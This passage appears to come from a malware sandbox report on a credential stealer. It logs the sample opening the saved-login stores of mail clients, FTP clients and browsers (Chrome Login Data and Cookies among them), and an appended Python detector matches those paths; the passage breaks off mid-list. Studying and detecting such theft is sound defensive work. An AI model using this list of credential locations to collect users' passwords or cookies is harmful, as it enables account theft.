                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\TCBI____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\TCCM____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\TCCB____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\TCCEB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ROCK.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ROCKI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ROCKB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ROCKEB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ROCKBI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ROCC____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ROCCB___.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\RAGE.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\PERTILI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\PERTIBD.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\PER_____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\PERI____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\PERB____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\PERBI___.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\PALSCRI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\MAIAN.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LTYPE.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LTYPEO.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LTYPEB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LSANS.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LSANSD.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LSANSI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\LSANSDI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\HATTEN.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GOUDOS.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GLECB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GIL_____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GILI____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GILB____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GILBI___.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GILC____.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GLSNECB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\GIGI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\FRABK.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\FRABKIT.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\FORTE.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\FELIXTI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ERASMD.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ERASBD.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ENGR.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CURLZ___.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\COPRGTL.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\COPRGTB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CENSCBK.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CASTELAR.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CALIST.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CALISTI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CALISTB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\CALISTBI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOOKOS.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOD_R.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOD_I.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOD_B.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOD_BI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOD_CR.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOD_CI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOD_CB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\AGENCYR.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\AGENCYB.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\BSSYM7.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\REFSAN.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\REFSPCL.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\marlett.ttf  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\segoeuii.ttf  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\segoeuiz.ttf  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\micross.ttf  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\seguisb.ttf  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Fonts\seguisbi.ttf  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\  VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Users\user\Desktop\wKQpOZ58Gl.exe  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll  VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: Yara match | File source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR
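The "File opened" / "Key opened" lines above are the raw telemetry behind the report's mail, FTP and browser credential-theft signatures. The following script is an added example, not part of the Joe Sandbox report and not the sandbox's own signature logic: it parses report-style event lines, maps each opened path or registry key to a credential store, and alerts when one process touches stores of several unrelated application families, which is the stealer pattern wKQpOZ58Gl.exe shows. The store patterns, the family threshold and the SAMPLE_EVENTS list (built to mirror the report's lines, plus two benign lines for contrast) are assumptions made for this example.

```python
"""Credential-store access correlation over sandbox file/registry events.

Added example (not from the Joe Sandbox report). Correlates "File opened" /
"Key opened" events per process and flags a process that reads credential
stores of several unrelated application families.
"""
import re
from collections import defaultdict

# Credential-store locations keyed "family:application". The patterns are
# assumptions chosen to cover the artifacts listed in the report.
CREDENTIAL_STORES = {
    "mail:thunderbird":       r"\\Thunderbird\\profiles\.ini$",
    "mail:incredimail":       r"\\IncrediMail\\Identities$",
    "mail:outlook":           r"\\Windows Messaging Subsystem\\Profiles\\",
    "ftp:winscp":             r"\\Martin Prikryl\\WinSCP 2\\Sessions$",
    "ftp:filezilla":          r"\\FileZilla\\recentservers\.xml$",
    "ftp:smartftp":           r"\\SmartFTP\\Client 2\.0\\Favorites\\",
    "browser:chrome-logins":  r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$",
    "browser:chrome-cookies": r"\\Google\\Chrome\\User Data\\[^\\]+\\Cookies$",
    "browser:firefox":        r"\\Mozilla\\Firefox\\profiles\.ini$",
}
_STORE_RE = {name: re.compile(pat, re.IGNORECASE) for name, pat in CREDENTIAL_STORES.items()}

# Report-style event line. The extracted report text fuses the process path
# and the operation ("...exeFile opened:"), so whitespace between them is optional.
EVENT_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?)\s*(?P<op>File opened|Key opened):\s*(?P<target>.+)$"
)


def parse_event(line):
    """Return (process, operation, target) or None for a non-event line."""
    m = EVENT_RE.match(line.strip())
    return (m.group("proc"), m.group("op"), m.group("target")) if m else None


def classify(target):
    """Map an opened file path or registry key to a credential store, or None."""
    for name, rx in _STORE_RE.items():
        if rx.search(target):
            return name
    return None


def detect(lines, min_families=2):
    """Correlate events per process.

    Returns {process: {"stores": [...], "families": [...], "alert": bool}}.
    A process alerts when it touches stores from at least min_families distinct
    application families; a browser reading its own cookie database stays below
    the threshold. Processes that touch no credential store are not reported.
    """
    touched = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        proc, _op, target = ev
        store = classify(target)
        if store:
            touched[proc].add(store)
    report = {}
    for proc, stores in touched.items():
        families = sorted({s.split(":", 1)[0] for s in stores})
        report[proc] = {"stores": sorted(stores), "families": families,
                        "alert": len(families) >= min_families}
    return report


MALWARE = r"C:\Users\user\Desktop\wKQpOZ58Gl.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
# Constructed sample: the first nine mirror the report's lines, the last two are benign.
SAMPLE_EVENTS = [
    f"Source: {MALWARE}File opened: " + r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini",
    f"Source: {MALWARE}Key opened: " + r"HKEY_CURRENT_USER\Software\IncrediMail\Identities",
    f"Source: {MALWARE}Key opened: " + r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
    f"Source: {MALWARE}Key opened: " + r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions",
    f"Source: {MALWARE}File opened: " + r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml",
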